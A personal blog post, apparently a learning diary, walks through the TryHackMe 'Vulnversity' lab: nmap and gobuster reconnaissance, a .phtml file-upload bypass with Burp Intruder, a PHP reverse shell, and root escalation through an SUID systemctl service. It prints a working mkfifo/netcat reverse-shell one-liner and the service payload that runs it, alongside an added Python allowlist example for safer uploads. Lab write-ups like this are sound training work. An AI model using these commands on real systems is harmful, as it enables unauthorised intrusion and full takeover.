Day 083 #FromZeroToHacker – Vulnversity

Time to learn about active recon, web app attacks and privilege escalation with a simulated target.

Let’s learn about it in our daily #FromZeroToHacker challenge.

Table of contents
Introduction
What have I learnt today?
Stats
Resources

Introduction

We have been learning about reconnaissance, enumeration, privilege escalation, etc., but each topic separately. Let’s put our hacking knowledge together and (pretend to be) hacking a remote system.

What have I learnt today?

Reconnaissance

Normal scan
nmap -sV <TARGET_IP>

Scan the first 400 ports
nmap -sV <TARGET_IP> -p-400

Enable OS detection
nmap -sV <TARGET_IP> -O

Increase the verbosity of your scan
nmap -sV <TARGET_IP> -v

Locating directories using Gobuster

Gobuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names.

gobuster dir -u http://<TARGET_IP>:<TARGET_PORT> -w <WORDLIST>

Extra flags: -e prints the full URLs in your console; -U and -P supply the username and password for HTTP basic auth.

Compromise the Webserver

We have found a form to upload files. Let’s upload and execute a payload to compromise the Webserver.

After many tries, .php doesn’t work, and neither does .php5 nor any other .php alternative. We could keep trying by hand, but why not use Burp Suite to automate the process?

  1. Open Burp Suite
  2. Upload a random file and submit it to capture the request. Then, send it to the Intruder.
  3. Click on Payloads, select Sniper and add this to the payloads: .php, .php3, .php4, .php5, .phtml.
  4. Run the attack. The only valid extension is .phtml.
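Why did .phtml slip through? The form refused a handful of known extensions (a denylist) instead of accepting only the ones it needs (an allowlist). This added Python example, which is not part of the room or of the original post, models both checks; the set of script extensions is an assumption and must be matched against the real web-server handler configuration.

```python
import posixpath
import secrets
from typing import List

# Extensions tried in the Intruder run above (taken from the page).
TRIED = [".php", ".php3", ".php4", ".php5", ".phtml"]

# Extensions a typical Apache/PHP handler may execute. This set is an
# assumption for the example; check your own mod_php / php-fpm config.
SCRIPT_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}

# Denylist behaving like the room's upload form: .phtml is simply missing.
DENYLIST = {".php", ".php3", ".php4", ".php5"}

# Allowlist for the hardened check: only what the form actually needs.
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}

def extension_of(filename: str) -> str:
    """Last dotted segment of the base name, lower-cased, with the dot."""
    name = posixpath.basename(filename.replace("\\", "/"))
    return "." + name.rsplit(".", 1)[1].lower() if "." in name else ""

def denylist_allows(filename: str) -> bool:
    """Weak check: refuse a few known-bad extensions, accept everything else."""
    return extension_of(filename) not in DENYLIST

def allowlist_allows(filename: str) -> bool:
    """Hardened check: accept only approved extensions and refuse any extra
    dotted segment a multi-extension handler could execute (shell.phtml.jpg)."""
    parts = posixpath.basename(filename.replace("\\", "/")).lower().split(".")
    if len(parts) < 2 or not parts[0] or "." + parts[-1] not in ALLOWLIST:
        return False
    return not any("." + seg in SCRIPT_EXTENSIONS for seg in parts[1:-1])

def denylist_gaps(candidates: List[str]) -> List[str]:
    """Extensions the denylist lets through although the server executes them;
    over TRIED this reproduces the Intruder result from the page."""
    return [e for e in candidates if e in SCRIPT_EXTENSIONS and denylist_allows("x" + e)]

def stored_name(filename: str) -> str:
    """Server-side name for an accepted upload: random base name, approved
    extension kept, so the uploader controls neither path nor base name."""
    if not allowlist_allows(filename):
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + extension_of(filename)
```

Serving the upload directory with script execution disabled (or from outside the web root) is the second half of the fix; the name check alone only narrows the window.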

We can upload a .php reverse shell hidden as .phtml.

  1. Download a reverse PHP shell such as this one. Modify it to change the default IP for yours.
  2. Rename the file to shell.phtml (the name doesn’t matter, the extension does).
  3. We have found that the website has a /internal/ directory, but is that everything in there? Let’s scan it: gobuster dir -u http://<TARGET_IP>:3333/internal/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
  4. It has another directory inside, /uploads/. Could this be where our file ends up? Let’s see if there are more directories inside: gobuster dir -u http://<TARGET_IP>:3333/internal/uploads -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
  5. Upload your file. It should be inside /internal/uploads/, so visit that URL.
  6. Our malicious file is uploaded. Time to open a listener on our computer with nc -lvnp 1234.
  7. Open the reverse shell file. The browser looks like it is still loading the page, but nothing is displayed. Good: that means the script is talking to our listener.
(Screenshot: uploaded shell)
(Screenshot: reverse shell)

Remember that you can improve your shell:

  • python -c 'import pty;pty.spawn("/bin/bash")' spawns a better shell
  • export TERM=xterm gives us access to terminal commands like clear
  • Press Ctrl+Z to background the shell, then stty raw -echo; fg brings it back fully interactive (tab completion, arrow keys, Ctrl+C without killing the session)

Privilege escalation

Our user is www-data, hardly an admin. Let’s escalate our privileges to become a superuser.

In Linux, SUID (Set owner User ID upon execution) is a particular type of file permission given to a file. It lets a user run the program with the privileges of the file’s owner rather than their own (and when the owner is root, that means the admin).

In this case, a mistake has been made: /usr/bin/passwd has SUID permissions, so we can change any password. ANY.

(Screenshot: SUID file)

We can list every SUID file owned by root, as our current user, with find / -user root -perm -4000 -exec ls -ldb {} \;.

Yes, /bin/systemctl (which manages system and service configurations) is vulnerable!

First, let’s create a file on the victim system that will execute a reverse shell:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LOCAL_IP> <LOCAL_PORT> >/tmp/f" > /tmp/shell.sh

(I have found this on GitHub Reverse Shells)

Then, we create a service and execute this service with systemctl (Code from GTFOBins):

TF=$(mktemp).service

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash /tmp/shell.sh"
[Install]
WantedBy=multi-user.target' > $TF

/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Now, we have a shell as a root user 🙂

Summary

Today we have revisited concepts such as:

  • Reconnaissance.
  • Locating directories with Gobuster.
  • Compromising a webserver with a PHP payload.
  • Privilege escalation.

Stats

From 49.775th to 48.986th.

Here is also the Skills Matrix:

(Image: Skills Matrix)

Resources

Random Room

TryHackMe: Vulnversity

Other resources

Burp Suite
PHP Reverse Shell
SUID
GitHub Reverse Shells
GTFOBins: systemctl